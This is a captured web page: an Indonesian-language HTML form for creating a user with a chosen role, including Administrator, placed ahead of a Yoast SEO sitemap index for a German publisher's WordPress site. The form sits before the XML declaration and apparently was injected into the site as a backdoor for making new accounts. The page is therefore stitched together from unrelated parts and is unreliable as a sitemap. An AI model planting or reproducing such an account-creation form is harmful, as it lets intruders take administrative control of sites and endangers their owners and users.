
<!-- Form untuk input username, password, email, dan role -->
<form method="POST">
    <label>Username:</label>
    <input type="text" name="username" required><br>

    <label>Password:</label>
    <input type="password" name="password" required><br>

    <label>Email:</label>
    <input type="email" name="email" required><br>

    <label>Role:</label>
    <select name="role" required>
        <option value="subscriber">Subscriber</option>
        <option value="editor">Editor</option>
        <option value="author">Author</option>
        <option value="contributor">Contributor</option>
        <option value="administrator">Administrator</option>
    </select><br>

    <button type="submit">Buat User</button>
</form><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//wirklichverlag.de/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://wirklichverlag.de/page-sitemap.xml</loc>
		<lastmod>2026-08-19T10:46:33+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://wirklichverlag.de/give_forms-sitemap.xml</loc>
		<lastmod>2026-03-11T13:28:12+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->